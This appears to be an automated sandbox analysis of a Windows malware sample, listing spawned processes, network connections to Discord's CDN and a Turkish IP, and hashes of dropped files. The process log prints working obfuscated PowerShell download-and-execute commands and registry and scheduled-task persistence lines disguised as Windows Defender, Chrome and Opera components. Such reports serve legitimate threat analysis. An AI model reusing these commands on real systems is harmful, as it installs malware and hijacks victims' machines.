
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcwBhACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAwADEAMQA0ADYANAAwADYAOQAyADkAMwAvAFcAaQBuAEQAZgB1AGwAdAAuAGUAeABlACcALAAgADwAIwBkAHgAaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAcABsACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAcgBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIAVwBpAG4ARABlAGYAYQB1AGwAdAAuAGUAeABlACcAKQApADwAIwB3AHkAYwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBqAGQAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBqAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMgBXAGkAbgBEAGUAZgBhAHUAbAB0AC4AZQB4AGUAJwApADwAIwB2AHMAaQAjAD4A"

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\ztMmUa8afO.exe

C:\Users\Admin\AppData\Local\Temp\ztMmUa8afO.exe

C:\Users\Admin\AppData\Local\Temp\ztMmUa8afO.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\aY2woVA23K.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZgBtACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAxADYANwA1ADQAMAA4ADEANgA4ADkAMAAzADAAMgA1ADcANAAvADEAMQA2ADcANQA0ADAAOQA4ADMAMQAyADMAMQA0ADgAOAAxADAALwBDAGgAcgBvAG0AZQBDAGUAcgB0AC4AZQB4AGUAJwAsACAAPAAjAGgAYwBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcQBmAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwBoAHIAbwBtAGUAQwByAHQALgBlAHgAZQAnACkAKQA8ACMAZQB2AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcwBlAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGEAdQBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMAaAByAG8AbQBlAEMAcgB0AC4AZQB4AGUAJwApADwAIwBpAHEAbQAjAD4A"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAdgB1ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAxADkAMAA4ADEAMgA1ADEANgAzADkAMwAvAFYAaQBzAHUAYQBsAFMAdAB1AGQAaQBvAEMAZQByAHQALgBlAHgAZQAnACwAIAA8ACMAcQBmAHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAHcAegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBzAGwAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAGkAcwB1AGEAbABTAHQAdQBkAGkAbwBvAC4AZQB4AGUAJwApACkAPAAjAG4AbABpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGsAdwBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAHkAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAGkAcwB1AGEAbABTAHQAdQBkAGkAbwBvAC4AZQB4AGUAJwApADwAIwBxAHEAZwAjAD4A"

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\iEwFLK0FEN.exe

C:\Users\Admin\AppData\Local\Temp\aY2woVA23K.exe

C:\Users\Admin\AppData\Local\Temp\aY2woVA23K.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe

C:\Users\Admin\AppData\Local\Temp\iEwFLK0FEN.exe

C:\Users\Admin\AppData\Local\Temp\iEwFLK0FEN.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\zhXaQqWy8P.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAZQB6ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAwADMAMwAyADUANwA2ADcAMgA4ADIANgAvAE8AcABlAHIAYQBDAGUAcgB0AC4AZQB4AGUAJwAsACAAPAAjAGwAYgB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYgB2AG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeABkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATwBwAGUAcgBhAEMAcgB0AC4AZQB4AGUAJwApACkAPAAjAGQAagBpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAdABuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB6AGQAdgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBPAHAAZQByAGEAQwByAHQALgBlAHgAZQAnACkAPAAjAGwAaABkACMAPgA="

C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe

C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAdQB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMAA5ADkANQAyADMANgAzADEAOQAzADEAMwAvAFcAaQBuAEQAZQBmAGEAdQBsAHQALgBlAHgAZQAnACwAIAA8ACMAcgBoAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGEAaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBkAGQAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkARABlAGYAYQB1AGwAdAAuAGUAeABlACcAKQApADwAIwBrAGUAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAHIAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBlAGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVwBpAEQAZQBmAGEAdQBsAHQALgBlAHgAZQAnACkAPAAjAGgAZgB3ACMAPgA="

C:\Users\Admin\AppData\Roaming\ChromeCrt.exe

"C:\Users\Admin\AppData\Roaming\ChromeCrt.exe"

C:\Users\Admin\AppData\Roaming\WiDefault.exe

"C:\Users\Admin\AppData\Roaming\WiDefault.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt' -Value '"C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\2WinDefault.exe

"C:\Users\Admin\AppData\Roaming\2WinDefault.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 6088 -ip 6088

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6088 -s 808

C:\Users\Admin\AppData\Roaming\OperaCrt.exe

"C:\Users\Admin\AppData\Roaming\OperaCrt.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert' -Value '"C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe"' -PropertyType 'String'

C:\Users\Admin\AppData\Roaming\VisualStudioo.exe

"C:\Users\Admin\AppData\Roaming\VisualStudioo.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert' -Value '"C:\Users\Admin\AppData\Roaming\VisualStudioCert\VisualStudioCert.exe"' -PropertyType 'String'

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k UnistackSvcGroup

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 img.guildedcdn.com udp
NL 13.227.219.55:443 img.guildedcdn.com tcp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 55.219.227.13.in-addr.arpa udp
US 8.8.8.8:53 133.113.22.20.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
NL 13.227.219.55:443 img.guildedcdn.com tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
NL 13.227.219.55:443 img.guildedcdn.com tcp
US 8.8.8.8:53 39.142.81.104.in-addr.arpa udp
NL 13.227.219.55:443 img.guildedcdn.com tcp
NL 13.227.219.55:443 img.guildedcdn.com tcp
NL 13.227.219.55:443 img.guildedcdn.com tcp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
NL 13.227.219.55:443 img.guildedcdn.com tcp
US 8.8.8.8:53 135.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
NL 13.227.219.55:443 img.guildedcdn.com tcp
US 8.8.8.8:53 25.14.97.104.in-addr.arpa udp
NL 13.227.219.55:443 img.guildedcdn.com tcp
US 8.8.8.8:53 1.202.248.87.in-addr.arpa udp
US 8.8.8.8:53 textbin.net udp
US 148.72.177.212:443 textbin.net tcp
US 8.8.8.8:53 212.177.72.148.in-addr.arpa udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
TR 46.1.103.69:4263 tcp
US 8.8.8.8:53 69.103.1.46.in-addr.arpa udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 17.14.97.104.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
TR 46.1.103.69:7355 tcp
TR 46.1.103.69:4263 tcp
TR 46.1.103.69:7355 tcp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp

Files

memory/4448-0-0x00000000006E0000-0x00000000006F6000-memory.dmp

memory/4448-1-0x0000000074EE0000-0x0000000075690000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\00b65495-88ce-45af-bf00-3dc3c78edb4f.bat

MD5 d0cec99ca3a717c587689ebf399662c4
SHA1 1d4bbaf8079912ada46a6fa8693d8c20d5ec5b66
SHA256 b1ae110ef84ecec90a75742ca29adc0704b67abe8f093aa5a959ea0864766228
SHA512 99b21193db6615a33eb738c246229e9a7efcaf03fcab24654d67680396155a0c62cbc834078687d75d1892b1708383eafeda4f87e86b33bd827b18bc988122f7

memory/1148-5-0x0000000074EE0000-0x0000000075690000-memory.dmp

memory/1148-4-0x0000000002760000-0x0000000002796000-memory.dmp

memory/1148-6-0x00000000027D0000-0x00000000027E0000-memory.dmp

memory/1148-7-0x0000000004F20000-0x0000000005548000-memory.dmp

memory/1148-8-0x0000000004E70000-0x0000000004E92000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_atkaxood.1fr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1148-9-0x0000000005640000-0x00000000056A6000-memory.dmp

memory/1148-19-0x00000000057F0000-0x0000000005856000-memory.dmp

memory/1148-20-0x00000000058A0000-0x0000000005BF4000-memory.dmp

memory/1148-21-0x0000000005D20000-0x0000000005D3E000-memory.dmp

memory/1148-22-0x0000000005F80000-0x0000000005FCC000-memory.dmp

memory/1148-23-0x00000000027D0000-0x00000000027E0000-memory.dmp

memory/1148-24-0x0000000007350000-0x00000000079CA000-memory.dmp

memory/1148-25-0x0000000006240000-0x000000000625A000-memory.dmp

memory/1148-29-0x0000000074EE0000-0x0000000075690000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 4280e36a29fa31c01e4d8b2ba726a0d8
SHA1 c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256 e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

memory/3160-31-0x0000000074EE0000-0x0000000075690000-memory.dmp

memory/3160-32-0x0000000004F40000-0x0000000004F50000-memory.dmp

memory/3160-33-0x0000000004F40000-0x0000000004F50000-memory.dmp

memory/3160-43-0x0000000005D80000-0x00000000060D4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6b86dab0b4639a6c4a2e22a9404f41c6
SHA1 d8a2dd2094749501265b86292111d262c3dd26e0
SHA256 2266c59704d7f547cac6c1213187aded24ec6f7cc6cd1899893a9ae9e79d2c05
SHA512 e2efee19fe2fa083548b0d05ebae58328e65312cb515487e18227bb1190a744dc9c0633f1eac24e6d263845b67369076ee52e6d905ea92ceb21431753a8e0a06

memory/3160-45-0x0000000004F40000-0x0000000004F50000-memory.dmp

memory/3160-48-0x0000000074EE0000-0x0000000075690000-memory.dmp

memory/5084-49-0x0000000074EE0000-0x0000000075690000-memory.dmp

memory/5084-50-0x0000000002870000-0x0000000002880000-memory.dmp

memory/5084-51-0x0000000002870000-0x0000000002880000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 057c44036d34160c061fa81a002d5e32
SHA1 d9e8a14611d71b30061eccdaba1788669fb5bbc6
SHA256 a273fa282eba071f61be75b77f636d968594004c1fc75bfd52ac227a4d52a46e
SHA512 ceab98de958cb892eff8ccb7750cc19a991c85de3c89d098fedbcd5accd2f7033a8a5c84e7ed3e3e26015d25e2d76548f5d84c4d133e85e394901337a46be317

memory/5084-62-0x0000000002870000-0x0000000002880000-memory.dmp

memory/5084-65-0x0000000074EE0000-0x0000000075690000-memory.dmp

memory/4448-66-0x0000000074EE0000-0x0000000075690000-memory.dmp

memory/4740-67-0x0000000074EE0000-0x0000000075690000-memory.dmp

memory/4740-68-0x0000000002BA0000-0x0000000002BB0000-memory.dmp

memory/4740-69-0x0000000002BA0000-0x0000000002BB0000-memory.dmp

memory/4740-79-0x0000000005B70000-0x0000000005EC4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f62b19723225d819cd88fd4eb6a2ad23
SHA1 8b6fb909001e01e8b3705fae6ce42f09fbf90444
SHA256 8a27f492edf8388023fe0b1e30b7c2dd2728a02e70dd530fe6257303fe264b29
SHA512 6dbede708ba2719d1bd10adc2052bf53aa88de24a41488e8d1dacaa65c41d8671224829e398bbdd163133145ec0c037a02a33a77361056d4f9429d126b29d703

memory/4740-81-0x0000000002BA0000-0x0000000002BB0000-memory.dmp

memory/4740-84-0x0000000074EE0000-0x0000000075690000-memory.dmp

memory/4456-85-0x0000000074EE0000-0x0000000075690000-memory.dmp

memory/4456-86-0x0000000004910000-0x0000000004920000-memory.dmp

memory/4456-87-0x0000000004910000-0x0000000004920000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 078837c4ad82944571dd2fb4de609def
SHA1 3ee63b8c74fa1feae4bbb50b274251a534582c12
SHA256 5f252aa586a1e08efc905f7d4b144724854ee2794b05489c4d8f41e28e4cab55
SHA512 bbb3ff6e23490de3cb620b4dadee5ed80106d7bd5f146b2ef10a900dee1e38b5fecd3e4add0ee149551ca0d036421af64891945ec5179466395edd5441acd7c0

memory/4456-100-0x0000000074EE0000-0x0000000075690000-memory.dmp

memory/5104-101-0x0000000074EE0000-0x0000000075690000-memory.dmp

memory/5104-102-0x0000000003220000-0x0000000003230000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bb7d76a883009ce8cc0221fded7cfd1d
SHA1 58ba94cba93d89804e855d488967bb562a48e186
SHA256 7b7c0a5c243d391e610de05a93fa6d9401872daba4b05eaeef9706dadcf7ec8b
SHA512 4a3c9c8f39c7130766a314bcd6c888c1dbbed832a8347ccd6d7d65ef696e99ba5a1a4ba89f49524edd31cba74810e9e6f6915c4c63f67ccc6ab89b0d9b8d0aa4

memory/5104-113-0x0000000003220000-0x0000000003230000-memory.dmp

memory/5104-116-0x0000000074EE0000-0x0000000075690000-memory.dmp

memory/2980-117-0x0000000074EE0000-0x0000000075690000-memory.dmp

memory/2980-118-0x0000000005440000-0x0000000005450000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 99d20a2441228126a68775b53ec0b0f3
SHA1 9c6347230648b26ae38d36ecf0bfb7d6b404e6ae
SHA256 6e80859e9ecac811cfbbc8876afaeb83935a4a346dfd6388f44fcc8e65b97802
SHA512 d98d77de92da93912cfb72e3fe3b10189eba4bce881f340baf2255c46678cd770fa69d92ed3e233df64f47d9021db4a3c37dadf6ca466ad6fbf043c774f49ada

memory/2980-129-0x0000000005440000-0x0000000005450000-memory.dmp

memory/2980-132-0x0000000074EE0000-0x0000000075690000-memory.dmp

C:\Users\Public\Music\RunNihaiersion.exe

MD5 123bdf05b4b261644ff4579b8bd78806
SHA1 d6ce6069ba2faed71c5626daf8094a7ac921848b
SHA256 9736150b75ca7c0c89b7e0530a98c640b3ee8863b0b39a56a1d8ff9b114de631
SHA512 e734bd6455e83144ee78d9fe393fb85f968e960a5908a22bd1d884478ca79c5cbef6d0ea010d6dd575920e6931ad0be8ea02af5da46668b7287f00e75afd93b5

C:\Users\Public\Music\RunNihaiersion.exe

MD5 123bdf05b4b261644ff4579b8bd78806
SHA1 d6ce6069ba2faed71c5626daf8094a7ac921848b
SHA256 9736150b75ca7c0c89b7e0530a98c640b3ee8863b0b39a56a1d8ff9b114de631
SHA512 e734bd6455e83144ee78d9fe393fb85f968e960a5908a22bd1d884478ca79c5cbef6d0ea010d6dd575920e6931ad0be8ea02af5da46668b7287f00e75afd93b5

memory/664-136-0x00000000006F0000-0x00000000006F8000-memory.dmp

memory/664-137-0x0000000074EE0000-0x0000000075690000-memory.dmp

C:\Users\Public\Music\bes.bat

MD5 9947ba16f06abcff429e922c49790337
SHA1 bd24d00f50e0d63892fc641a1438551d577b6e50
SHA256 8683fbcb2068bf7759e1b221e2dc660757e96e2a23ac9404a541ba82fb9c4a4f
SHA512 2a8ace440d7ab8a3ae6f02a84b5f7c81872d09946752ec02ac1a0fc64d9e1cfcb891c935f11394e395c748fb5b0f8a320f71dac25fa0c19a8a87e688af49cd11

memory/664-140-0x0000000074EE0000-0x0000000075690000-memory.dmp

C:\Users\Public\Music\israil.exe

MD5 b65cd9956dfe1877c72ffe687fc632b4
SHA1 86c1bc804f2394bb0b20fa7434257786eb72e5bf
SHA256 561d189fb1c2b89e27f0e4be57c4b16dbced1d1940712fed04adfc35d34b05a0
SHA512 fb2f44fa8821c9d5e048b74a17cdf2bd1a545e4c9c2af7a15ad50e53766c44e50d7dd1c805f0e88e7170f8ae43895977b96e6dec766225670a8e035cd421f4fd

C:\Users\Public\Music\israil.exe

MD5 b65cd9956dfe1877c72ffe687fc632b4
SHA1 86c1bc804f2394bb0b20fa7434257786eb72e5bf
SHA256 561d189fb1c2b89e27f0e4be57c4b16dbced1d1940712fed04adfc35d34b05a0
SHA512 fb2f44fa8821c9d5e048b74a17cdf2bd1a545e4c9c2af7a15ad50e53766c44e50d7dd1c805f0e88e7170f8ae43895977b96e6dec766225670a8e035cd421f4fd

memory/4504-145-0x0000000074EE0000-0x0000000075690000-memory.dmp

memory/4504-144-0x0000000000B30000-0x0000000000B38000-memory.dmp

C:\Users\Public\Music\installer2.bat

MD5 50b98ed3895545b2b72b28966cfa2b0d
SHA1 bf98a58225c8ce199e48825624e793ee8e0ca3f8
SHA256 ac019bd8d7937f836b6039c3d0a33c8e75509fb0ab79ee41ec3171f0cb0e1591
SHA512 af1c1bb692280e89df2a92f6aedbb90d76e3017572723f1bcacd092ecfd07cb1b05ebb9eb4dc322628d0734f96c95cae0e360042162859e55af957009bf0acaa

memory/4504-148-0x0000000074EE0000-0x0000000075690000-memory.dmp

memory/4472-149-0x0000000074EE0000-0x0000000075690000-memory.dmp

memory/4472-150-0x0000000000CE0000-0x0000000000CF0000-memory.dmp

memory/4472-151-0x0000000000CE0000-0x0000000000CF0000-memory.dmp

memory/4472-161-0x0000000005DD0000-0x0000000006124000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e4932a29fac55eb658647a86e86cf995
SHA1 ceb8fb034cda8494f2eace540d1b4c72b9708604
SHA256 27c93601c7a659ba659cd2b52024a8eeb21f57dc9239a7359ea8aa554b094d33
SHA512 4450c7eced5610d29a4bef144ff73ede5463ed8fdc377fb3333ea5806918b1d08e806262a0b06cb049a03d26e2021400820f55fb41a85b06629230d721938145

memory/4472-163-0x0000000000CE0000-0x0000000000CF0000-memory.dmp

memory/4472-164-0x0000000007050000-0x0000000007082000-memory.dmp

